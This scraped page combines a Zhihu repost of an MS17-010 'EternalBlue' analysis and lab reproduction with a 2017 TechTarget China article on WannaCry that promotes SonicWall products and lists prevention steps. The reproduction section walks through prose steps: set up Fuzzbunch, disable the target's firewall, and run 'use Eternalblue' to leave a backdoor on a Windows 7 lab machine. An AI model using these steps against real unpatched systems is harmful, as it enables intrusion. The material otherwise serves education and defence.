腾讯云 版权所有 深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 深公网安备号 44030502008569腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号 | 京公网安备号11010802020287问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档Copyright © 2013 - 2024 Tencent Cloud.All Rights Reserved. 腾讯云 版权所有登录 后参与评论00
MS17-010 “永恒之蓝”漏洞分析与复现 - 知乎
MS17-010 “永恒之蓝”漏洞分析与复现 - 知乎切换模式写文章登录/注册MS17-010 “永恒之蓝”漏洞分析与复现看雪看雪,为IT专业人士、技术专家提供了一个民间交流与合作空间。本文为看雪论坛优秀文章看雪论坛作者ID:Sal_Tay一、漏洞信息1、 漏洞简述漏洞名称:“永恒之蓝”漏洞漏洞编号:MS17-010,CVE-2017-0143/0144/0145/0146/0147/0148漏洞类型:缓冲区溢出漏洞漏洞影响:信息泄露CVSS评分:9.3(High)利用难度:Medium基础权限:不需要2、组件概述SMB(Server Message Block)是一个协议名,它能被用于Web连接和客户端与服务器之间的信息沟通。其目的是将DOS操作系统中的本地文件接口“中断13”改造为网络文件系统。SMB1.0协议由于在文件共享传输过程中存在的传输效率低以及传输空间小等缺陷被人们所摒弃。为了更好的实现网络中文件的共享过程,在SMB1.0的基础上开发了新的网络文件传输协议,并将其命名为SMB2.0。该协议在实现了文件共享传输的基本功能的基础上对文件传输的效率、文件缓存的空间以及文件并发传输等问题进行改进,使得在局域网或更高配置的网络环境下,文件传输过程的速度和效率等得到了很大的提升。3、 漏洞影响Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016以上系统打开445号端口都容易受到影响。4、解决方案禁用 SMBv1对于客户端操作系统:打开“控制面板”,单击“程序”,然后单击“打开或关闭 Windows 功能”。在 Windows 功能窗口中,清除SMB1.0/CIFS 文件共享支持复选框,然后单击确定关闭窗口。重新启动系统。对于服务器操作系统:打开服务器管理器,然后单击管理菜单并选择删除角色和功能。在功能窗口中,清除SMB1.0/CIFS 文件共享支持复选框,然后单击确定关闭窗口。重新启动系统。更新Windows系统补丁:官方文档链接二、漏洞复现1、环境搭建实验中需要用到三个机器,分别是调试机,靶机(被调试机),攻击机。调试机环境:主机Windows 10x64专业版 1909靶机(被调试机)环境:Windows 7x86 SP1靶机(被调试机)配置:192.168.44.132:445攻击机环境:Windows XPx86 SP3攻击机配置:192.168.44.152(1)双机内核调试首先需要用调试机调试靶机,具体实现双机调试请看这里。(2)安装并配置fuzzbunch另外需要在攻击机安装fuzzbunch实现永恒之蓝漏洞:安装Python 2.6安装PyWin32,需要以管理员权限进行安装下载fuzzbunch在shadowbroker-master的子目录windows中新建listeningposts文件夹,同时修改FuzzyBunch.xml文件内容,设置相应的ResourcesDir和LogDir参数值,修改结果如下图所示。(路径根据实际情况而定)(3)靶机环境配置打开靶机445端口,具体打开方法点这里关闭防火墙:控制面板-系统和安全-Windows防火墙-打开或关闭Windows防火墙-全部选择关闭防火墙。3、复现过程在攻击机中启动命令行,进入fuzzbench的Windows文件夹,用python启动fuzzbench:启动后设置靶机IP-设置击机IP-重定向no-log地址确认(无误直接回车)-0+回车(创建新的项目)-为项目命名-设置路径(Yes)-:使用永恒之蓝建立后门:use Eternalblue之后一直回车到出现设置靶机系统版本,本次复现靶机为Win7,所以选择1:下一项模式选择1,FB模式:接下来一直回车即可,即可看到插件运行,并成功利用永恒之蓝漏洞在靶机系统中留下后门:完整阅读请点击:MS17-010 “永恒之蓝”漏洞分析与复现 (qq.com)发布于 2021-09-09 18:27Wana Decrypt0r 2.0(计算机病毒)安全漏洞缓冲区溢出赞同 5添加评论分享喜欢收藏申请
“永恒之蓝”漏洞和WannaCry病毒完整解析及SonicWall应对攻略 - TechTarget安全
“永恒之蓝”漏洞和WannaCry病毒完整解析及SonicWall应对攻略 - TechTarget安全
searchBI.com.cn
商务智能网站
searchCIO.com.cn
信息化网站
searchCloudComputing.com.cn云计算网站
searchDatabase.com.cn数据库网站
searchDataCenter.com.cn数据中心网站
searchNetworking.com.cn网络网站
searchSecurity.com.cn安全网站
searchStorage.com.cn存储网站
searchVirtual.com.cn虚拟化网站
TechTarget安全
登录
RSS
首页
新闻
分析
技巧
话题
技术手册
专家面对面
深度专题
“永恒之蓝”漏洞和WannaCry病毒完整解析及SonicWall应对攻略
日期:
2017-05-14
作者:张程程 来源:TechTarget中国
EternalBlueSONICWALLWannaCry勒索病毒永恒之蓝
背景前陈
5月12日,有英媒报道其国家医疗机构电脑系统感染WannaCry勒索病毒,短短几个小时,该勒索病毒迅速扩散至全球超过99个国家和地区,从俄罗斯内政部,到中国大学生的个人电脑系统等均纷纷沦陷。
一旦WannaCry勒索病毒锁定你的电脑,立马会植入恶意软件。对于那些没有打补丁的Windows电脑,只要联网且开启了445端口SMB文件共享服务,则无需任何操作即可被感染此勒索病毒。感染后用户电脑里的所有数据都会被加密,然后屏幕会弹出消息框要求受害人在3天内支付价值300美元的比特币赎金。
而要扒横空出世的WannaCry勒索病毒,则要从其源头软件“永恒之蓝”(EternalBlue)说起。
“永恒之蓝”漏洞和WannaCry勒索病毒的完整解析
“永恒之蓝”(EternalBlue)是美国国家安全局NSA旗下的黑客组织Equation Group开发的网络攻击工具。它扫描并利用运行在TCP 445端口之上的Windows SMB (Server Message Block)文件共享协议的漏洞, 上传勒索软件等恶意软件到Windows系统,对用户的文件进行加密并勒索赎金。
2017年4月,Shadow Broker黑客组织入侵了Equation Group的网络,窃取了大量网络攻击工具,并把它放到互联网上拍卖。为证明其拍卖的黑客工具的真实性和有效性,Shadow Broker黑客组织在网上公布了他们窃取来的一部分黑客工具,包括“永恒之蓝”恶意软件的密码,该软件即是WannaCry勒索病毒的源头软件。
WannaCry勒索病毒是黑客在“永恒之蓝”的基础上开发的蠕虫病毒,它可以自我复制传播。该蠕虫病毒先扫描网络上存在SMB漏洞的Windows机器,然后上传勒索软件到该Windows系统,锁定用户的数据并进行勒索,是一个典型的蠕虫和勒索软件的结合体。
最新SonicWall下一代防火墙已能够有效应对WannaCry勒索病毒
SonicWall安全防御团队早在今年4月份Shadow Broker黑客组织发布“永恒之蓝”的第一时间就对其进行了快速分析和诊断,并于4月20日更新了多个IPS签名,能够有效阻断黑客利用“永恒之蓝”工具以及基于该工具开发的蠕虫病毒针对 Windows SMB漏洞进行的入侵行为。
因此,对于SonicWall下一代防火墙IPS(入侵防御)服务在有效期内的用户则无需担心,SonicWall下一代防火墙在4月20日起即已能够防御“永恒之蓝”攻击工具及其同类软件的入侵行为,保护用户的网络免受WannaCry勒索病毒侵扰。
黑客能够利用“永恒之蓝”工具和Windows SMB漏洞上传任何恶意软件,且勒索软件可通过电子邮件传播,对此,SonicWall已发布数个勒索软件病毒签名,阻断通过电子邮件或利用SMB漏洞上传的勒索软件。
因此,对于SonicWall下一代防火墙GAV网关杀毒服务在有效期内的用户亦可放心,该服务能够有效地防御WannaCry勒索病毒及多个变种。网关杀毒防御勒索软件是对IPS入侵检测防御“永恒之蓝”入侵的一个补充,可以阻止经电子邮件途径传播的勒索病毒。
此外,SonicWall Capture服务(云端沙盒)能够检测未知安全威胁, 是IPS入侵防御和GAV网关杀毒服务的有效补充。对IPS和GAV网关杀毒不能确认的文件,例如快速出现的任意新的勒索软件变种,SonicWall Capture的多引擎可做并行检测,使恶意软件难以逃避检测。SonicWall Capture能够对WannaCry的新变种及其它勒索软件做准确的判断,并阻断其传播。
用户该购买哪些服务以效防御此类安全威胁?
· 没有购买SonicWall下一代防火墙的用户在购买SonicWall下一代防火墙时,请同时购买AGSS服务,即高级网关安全服务包,包含Capture多引擎沙盒、入侵检测、网关杀毒、内容过滤及厂商7*24技术支持服务;或购买CGSS服务,包含全部AGSS安全服务功能,但没有Capture多引擎沙盒服务;也可购买UTM杀毒和入侵防御服务,但是缺少Capture多引擎沙盒对未知安全威胁的检测及厂商的7*24技术支持服务。
AGSS License。包含Capture沙盒服务和UTM的应用层安全防御功能,每个设备型号有对应的SKU,下面SKU是以NSA3600为例。AGSS包含最全的安全服务,可以应对已知和未知安全威胁。
CGSS License。相比AGSS,缺少Capture沙盒服务,其它服务相同。不能应对未知安全威胁。
UTM License。相比CGSS,缺少内容过滤,7*24 支持服务,包含IPS,恶意软件扫描和应用控制。
· 使用SonicWall第五代及更早硬件平台的用户,可以购买CGSS或UTM服务,但是缺少Capture多引擎沙盒对未知安全威胁的防护。建议用户升级到SonicWall第六代硬件平台以支持最新的Capture沙盒功能。
如何预防此类威胁发生?
除了在互联网出口使用下一代防火墙,企业可采取下列措施以预防此类威胁的发生:
1. 升级Windows操作系统,目前微软公司已发布相关补丁程序MS17-010,可通过微软公司正规渠道进行升级。
2. 电脑上安装有效的杀毒软件,避免U盘、内网文件共享、VLAN内部的蠕虫勒索软件的传播。
3. 及时关闭计算机、网络设备上的445端口。
4. 不要轻易打开来源不明的电子邮件。
5. 不要使用Windows XP、Windows Server 2003等没有微软服务和支持的产品,因为其不具备定期的安全补丁的更新。
6. 定期在不同的存储介质上备份计算机上的重要文件。
我们一直都在努力坚持原创.......请不要一声不吭,就悄悄拿走。
我原创,你原创,我们的内容世界才会更加精彩!
【所有原创内容版权均属TechTarget,欢迎大家转发分享。但未经授权,严禁任何媒体(平面媒体、网络媒体、自媒体等)以及微信公众号复制、转载、摘编或以其他方式进行使用。】
微信公众号
TechTarget
官方微博
TechTarget中国
取消回复
电子邮件地址不会被公开。 必填项已用*标注评论 敬请读者发表评论,本站保留删除与本文无关和不雅评论的权力。姓名 *
电子邮件 *
站点
Save my name, email, and website in this browser for the next time I comment.
作者
张程程
TechTarget中国编辑。专注报道企业级安全、网络领域的技术更迭和趋势变革,负责安全网站与网络网站的内容规划、组稿、原创和编辑。
相关推荐
又现新型勒索病毒!不过黑客可能拿不到赎金
目前受害者需联系的邮件地址已被经营商停用,这意味着黑客们无法访问他们的电子邮件,而受害者也不能再通过电子邮件发送到该帐户。这阻止了黑客滥用邮箱地址,因而黑客可能拿不到赎金……
从WannaCry事件吸取教训:补丁管理需自动化
更新升级软件是企业IT管理员的一项份内职责。为了提高打补丁的效率,符合合规要求,企业常需要购买补丁管理工具。补丁管理工具可实现更新的自动化,有助于保护企业基础架构和终端设备免受可能的安全威胁,并支持在线修复软件bug及增强功能……
华为宋端智:“防患于未然”才是安全的最高境界
面对这次WannaCry的爆发,有效地破解它只是第一步,更关键的是用户要提升防御未知威胁的技能,建立无处不在的安全体系……
Samba漏洞将“类WannaCry威胁”带入Linux/Unix
Samba漏洞增加了WannaCry这类恶意病毒攻击Linux和Unix系统的可能性,好在可以采取相应措施进行缓解。
最专业的
企业级IT网站群
云计算网站
信息化网站
安全网站
虚拟化网站
数据库网站
数据中心网站
商务智能网站
存储网站
网络网站
文章存档
网站地图
微信公众号
官方微博
TechTarget中国 版权所有 隐私政策
京ICP备17051608号
京公网安备11010502033027号
All Rights Reserved, Copyright2024
TechTarget中国 版权所有 隐私政策京ICP备17051608号京公网安备11010502033027号 All Rights Reserved, Copyright2024